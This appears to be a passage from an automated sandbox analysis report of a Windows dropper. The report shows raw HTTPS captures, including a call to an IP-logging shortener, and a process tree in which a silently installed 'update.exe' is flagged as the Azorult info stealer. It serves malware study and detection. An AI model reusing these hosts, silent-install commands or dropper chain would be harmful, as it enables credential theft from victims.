                                                                                                          Jan 2, 2025 02:28:19.514755011 CET1236INData Raw: 37 44 43 6f 61 68 47 37 30 6a 45 53 77 64 30 6e 52 4f 42 45 66 38 39 41 65 52 50 74 71 4a 49 6f 47 49 65 30 4e 62 6b 7a 37 62 4a 30 71 57 54 6a 53 34 4c 4f 52 7a 45 6c 5a 51 67 4d 6b 66 50 77 72 73 65 67 55 4c 61 53 53 4c 48 42 6d 41 59 38 36 32
                                                                                                          Data Ascii: 7DCoahG70jESwd0nROBEf89AeRPtqJIoGIe0Nbkz7bJ0qWTjS4LORzElZQgMkfPwrsegULaSSLHBmAY862upET1q5LZOiQfgC+jvOMVo6gUE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwY
                                                                                                          Jan 2, 2025 02:28:19.514765024 CET1236INData Raw: 6d 43 56 34 67 79 6f 5a 4c 47 78 65 43 4a 4e 48 39 70 5a 45 78 63 79 70 77 74 62 74 73 48 7a 57 6a 76 72 45 68 6a 57 6d 62 73 75 74 74 4b 66 74 4c 7a 70 39 4e 59 4a 56 42 76 76 77 6c 5a 63 2b 46 7a 35 61 37 6b 57 6d 36 6f 73 73 44 57 38 55 35 4b
                                                                                                          Data Ascii: mCV4gyoZLGxeCJNH9pZExcypwtbtsHzWjvrEhjWmbsuttKftLzp9NYJVBvvwlZc+Fz5a7kWm6ossDW8U5Kd15D0s8MNb9Oi2nCxOn0juliIH64uYyJOO7Uo2OycJnrEL8L/VB5nRbxRltKRvfkq3TDHGh0ttfomyUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVe
                                                                                                          Jan 2, 2025 02:28:19.514776945 CET1236INData Raw: 50 5a 53 64 37 63 30 59 58 47 67 4d 74 79 6f 5a 41 34 41 36 75 56 43 56 58 46 68 32 4d 5a 6d 4c 6d 52 54 4e 30 54 68 65 71 75 34 53 55 72 44 4b 79 76 4f 6b 76 42 53 56 33 4f 43 36 2b 7a 4b 62 77 4a 59 56 31 64 51 75 4d 6b 6c 58 6a 46 72 51 56 48
                                                                                                          Data Ascii: PZSd7c0YXGgMtyoZA4A6uVCVXFh2MZmLmRTN0Thequ4SUrDKyvOkvBSV3OC6+zKbwJYV1dQuMklXjFrQVHLIL3mm7AtfFZtITmvurTXWOeaT4wIFywRCdslFT5IuLsiEQOIB+lVX98PEd3cOjvrHhcSZmXrSywcXMyZT/vFBUZvojgYMrscMLoMPVMqu5wBXcTlaSFxjfi6PA6MSm6gqii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6
                                                                                                          Jan 2, 2025 02:28:19.514789104 CET1236INData Raw: 75 77 64 51 64 57 2f 4b 49 4c 43 6a 50 4f 4f 42 44 49 6c 59 30 32 69 76 74 6e 6e 57 7a 31 4c 59 52 74 44 69 79 38 46 51 71 2f 5a 53 45 48 4b 43 30 6d 64 30 43 45 56 71 4b 77 72 55 4d 66 59 78 75 35 37 39 78 4d 66 50 75 6f 4e 47 75 68 75 66 41 36
                                                                                                          Data Ascii: uwdQdW/KILCjPOOBDIlY02ivtnnWz1LYRtDiy8FQq/ZSEHKC0md0CEVqKwrUMfYxu579xMfPuoNGuhufA66C3QDDC930L3kSC555M3U2zwYwZ12EKw3xSgdFzNbtpz6pB8MmyMcLRPXtVUh/DBQW9AftlqeW5DT3dufcXQlljNo6ImCHXtDmMae6Gay7yEKV/c0QWjTcCE1iCVzYgxB+Nj8M0u2nPqqHw38i9juuWp5dHdCOWjU
                                                                                                          Jan 2, 2025 02:28:19.514863968 CET1236INData Raw: 71 61 6c 67 76 4a 2f 4f 2f 59 37 34 32 56 2f 70 57 74 67 31 48 47 73 61 35 33 4e 4a 51 66 4c 2f 35 6f 34 75 72 72 52 6a 36 61 64 4a 38 2f 2f 45 4d 37 7a 41 75 5a 64 72 67 6c 55 78 6a 70 76 50 4a 6c 41 38 36 61 36 59 6d 6d 68 63 49 32 68 66 68 7a
                                                                                                          Data Ascii: qalgvJ/O/Y742V/pWtg1HGsa53NJQfL/5o4urrRj6adJ8//EM7zAuZdrglUxjpvPJlA86a6YmmhcI2hfhz8cNvOsv0PfwDC4y5Pa8paX9wh37G3omKs7LXGuWjS5KUARza327IZp3BqUsFCT1Kq5k6Gp0WppjevW+ntANpVKc6OjaL8PHVLT/RbvLoUxrHKm3WzDF4jh8T5/M9f5U2OzdPD+EoMpRYLRTq0ab84kj+5aRy5Cc3g
                                                                                                          Jan 2, 2025 02:28:19.514875889 CET1236INData Raw: 58 4d 6e 53 56 70 2b 4c 34 43 73 61 68 6d 46 6a 6a 46 62 4b 44 6d 73 33 78 2b 31 70 36 64 67 6a 46 2f 47 6a 2b 39 6d 62 71 6a 76 7a 50 31 78 62 30 33 74 33 52 4b 45 43 59 33 47 74 33 5a 4f 6f 32 7a 36 30 6c 52 34 46 52 73 6d 72 63 5a 33 48 2f 6d
                                                                                                          Data Ascii: XMnSVp+L4CsahmFjjFbKDms3x+1p6dgjF/Gj+9mbqjvzP1xb03t3RKECY3Gt3ZOo2z60lR4FRsmrcZ3H/mzib6AKNIy19h25GSdXr8w28P2WYu6aT8enibbz/yxErG0XEd3EWS7ae5VPcqAS6h3IoMLEZKae6boXbPFYNAmdWHWLo3CnzXpHt04w+AexdW4HVxIy5LswOggLgc8HaTBkPkyxeHAVG81g1OM+nPo7uDZqTqZ19CX
                                                                                                          Jan 2, 2025 02:28:19.514887094 CET332INData Raw: 59 35 62 77 4d 34 52 44 47 70 32 57 73 70 74 34 79 4a 2b 73 78 4a 35 51 4b 39 35 2f 4d 4e 45 49 57 77 42 2b 69 37 2f 73 56 54 7a 48 56 75 70 7a 7a 57 68 62 41 66 76 73 58 31 6d 6c 70 41 63 2f 78 33 76 72 73 6e 4e 43 65 61 4c 78 5a 63 36 56 50 55
                                                                                                          Data Ascii: Y5bwM4RDGp2Wspt4yJ+sxJ5QK95/MNEIWwB+i7/sVTzHVupzzWhbAfvsX1mlpAc/x3vrsnNCeaLxZc6VPUQLbCCk4/DkmQY4KQZ2u2U1TorBwgMuy0buIRYDgSu/7eNKcA9b3OFXyj+dimjZunKg2Dlf1W5tMTCwbpcuELB4BP2bYy2TVeIjx/TlokUXZSIocDre5ryHIPov3oFiYU5lphZTMd5j6yhOz4Lu8QAo9pZf+tmfnG4
                                                                                                          Jan 2, 2025 02:28:19.519337893 CET1236INData Raw: 43 34 69 5a 53 37 66 47 6b 57 76 6b 6f 68 6d 64 71 57 7a 56 61 59 51 57 54 73 73 46 6c 65 52 32 67 65 43 79 70 75 76 49 4a 46 59 49 39 55 66 48 47 52 4e 4c 36 58 38 38 6b 64 45 2f 4e 38 54 76 4f 79 34 48 48 30 4c 35 52 38 46 35 62 6b 37 69 68 47
                                                                                                          Data Ascii: C4iZS7fGkWvkohmdqWzVaYQWTssFleR2geCypuvIJFYI9UfHGRNL6X88kdE/N8TvOy4HH0L5R8F5bk7ihGQf26u6MNF3HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxr


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449730104.21.79.2294436816C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-02 01:27:06 UTC146OUTGET /1dHC37 HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                          Host: 2no.co
                                                                                                          2025-01-02 01:27:06 UTC1058INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 02 Jan 2025 01:27:06 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          memory: 0.35894012451171875
                                                                                                          expires: Thu, 02 Jan 2025 01:27:06 +0000
                                                                                                          strict-transport-security: max-age=604800
                                                                                                          strict-transport-security: max-age=31536000
                                                                                                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FDvvXZrrZzr0pol4aDEbgVCVTfiiAGToSMjVaqr8nrJx6Yvvt0Umwao6ky9BpHeHb2RIZTCbW02XKQ2L91tyYrn0Bt1WRWJXxI4NyfwCf4imB%2FED7Izqmw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb6f6f7f83cf78f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1630&rtt_var=634&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=760&delivery_rate=1696687&cwnd=137&unsent_bytes=0&cid=340b99d4f0c4459e&ts=517&x=0"
                                                                                                          2025-01-02 01:27:06 UTC311INData Raw: 31 63 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                                                                          Data Ascii: 1cf6<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                                                                          2025-01-02 01:27:06 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 44 65 6f 72 67 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 49 50 4c 6f 67 67 65 72 20 32 30 31 30 2d 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d
                                                                                                          Data Ascii: r" content="Deorg" /><meta name="copyright" content="Copyright IPLogger 2010-" /><meta name="robots" content="index, follow" /><meta name="revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, dom
                                                                                                          2025-01-02 01:27:06 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 3a 23 45 35 45 35 45 35 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6c 6f 61 64 65 72 2e 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61
                                                                                                          Data Ascii: kground:#E5E5E5;z-index:10000;padding-top:250px;text-align:center}#loader.hidden{display:none}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;a
                                                                                                          2025-01-02 01:27:06 UTC1369INData Raw: 6e 74 65 72 7d 0a 09 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 7b 23 6d 61 70 70 65 72 7b 68 65 69 67 68 74 3a 33 30 30 70 78 3b 7d 2e 6d 79 6d 61 70 7b 68 65 69 67 68 74 3a 33 30 30 70 78 3b 7d 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f
                                                                                                          Data Ascii: nter}@media (max-width: 800px){#mapper{height:300px;}.mymap{height:300px;}}</style><script>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersio
                                                                                                          2025-01-02 01:27:06 UTC1369INData Raw: 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 27 6c 6f 61 64 65 72 27 3e 0a 09 09 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 09 09 3c 64 69 76 3e 43 68 65 63 6b 69 6e 67 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d
                                                                                                          Data Ascii: ody><div id='loader'><span></span><span></span><span></span><div>Checking browser before processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-
                                                                                                          2025-01-02 01:27:06 UTC1369INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 77 69 64 74 68 3a 31 35 34 70 78 3b 68 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                          Data Ascii: background-repeat:no-repeat;background-size:contain;width:154px;height:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="
                                                                                                          2025-01-02 01:27:06 UTC266INData Raw: 74 74 70 73 3a 2f 2f 32 6e 6f 2e 63 6f 2f 72 65 64 69 72 65 63 74 2d 27 29 29 2c 75 72 6c 2e 70 75 73 68 28 27 68 27 2b 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 35 30 29 29 29 2c 75 72 6c 2e 70 75 73 68 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79
                                                                                                          Data Ascii: ttps://2no.co/redirect-')),url.push('h'+escape(document.title.substring(0,150))),url.push(Math.random()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body
                                                                                                          2025-01-02 01:27:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449732172.217.16.2124433848C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-02 01:27:10 UTC441OUTGET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-453A430160CEF13230B9413C30A336AE-BDBEC76D9EE81A8CBE827F8B10FCC2A4&vrs=3.0.0.505&prg=explorer&uid=5153dce68ee7dc529e3ee1aac6d1b34a HTTP/1.1
                                                                                                          User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)
                                                                                                          Host: neosoft-activator.appspot.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-02 01:27:12 UTC300INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          X-Cloud-Trace-Context: fd5e4ce48ec25e727745082fe2a637a2
                                                                                                          Date: Thu, 02 Jan 2025 01:27:12 GMT
                                                                                                          Server: Google Frontend
                                                                                                          Content-Length: 500
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-02 01:27:12 UTC500INData Raw: 41 63 74 69 76 61 74 69 6f 6e 20 72 65 73 75 6c 74 0d 0a 56 61 6c 69 64 0d 0a 75 71 6d 55 54 33 6d 46 4a 6b 4f 71 7a 75 73 4d 31 59 4a 32 53 79 50 70 4d 63 54 59 36 4d 58 44 4b 57 42 4a 4c 42 76 6e 7a 61 48 75 33 59 4d 39 6a 2f 65 66 74 39 79 6d 43 66 53 45 35 43 79 51 54 47 73 67 35 43 43 65 36 37 34 6e 51 42 30 37 53 44 36 35 67 4c 43 56 6d 39 6c 6b 79 79 72 4c 6a 75 48 42 45 6b 69 68 51 33 69 70 30 4a 56 34 38 77 5a 75 76 63 57 76 38 32 57 6c 68 39 35 71 0d 0a 2f 6f 66 4e 4d 37 38 66 46 33 67 67 64 34 43 42 71 4f 57 52 59 57 59 7a 7a 37 4e 43 52 62 4a 6b 38 73 52 45 45 6b 73 44 6b 47 61 45 50 43 75 57 66 39 4f 7a 74 6b 64 44 55 31 34 51 44 4b 67 52 47 2f 4b 64 6d 46 7a 37 44 77 78 58 6e 72 37 4d 6a 62 58 53 37 45 66 45 70 4c 54 6b 42 54 63 46 37 44 53
                                                                                                          Data Ascii: Activation resultValiduqmUT3mFJkOqzusM1YJ2SyPpMcTY6MXDKWBJLBvnzaHu3YM9j/eft9ymCfSE5CyQTGsg5CCe674nQB07SD65gLCVm9lkyyrLjuHBEkihQ3ip0JV48wZuvcWv82Wlh95q/ofNM78fF3ggd4CBqOWRYWYzz7NCRbJk8sREEksDkGaEPCuWf9OztkdDU14QDKgRG/KdmFz7DwxXnr7MjbXS7EfEpLTkBTcF7DS


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:20:26:57
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\ETVk1yP43q.exe"
                                                                                                          Imagebase:0x3e0000
                                                                                                          File size:8'302'080 bytes
                                                                                                          MD5 hash:56ECF4355112DCD2F73E04D0D1784178
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:20:27:03
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\cexplorer.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                                                                                                          Imagebase:0x400000
                                                                                                          File size:6'860'752 bytes
                                                                                                          MD5 hash:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 2%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:20:27:03
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'185'824 bytes
                                                                                                          MD5 hash:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:20:27:05
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\update.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:700'768 bytes
                                                                                                          MD5 hash:912B031EAEE45A05000F7DE4E9B734BC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 79%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:20:27:05
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:20:27:14
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:20:27:16
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:20:27:18
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:11
                                                                                                          Start time:20:27:18
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
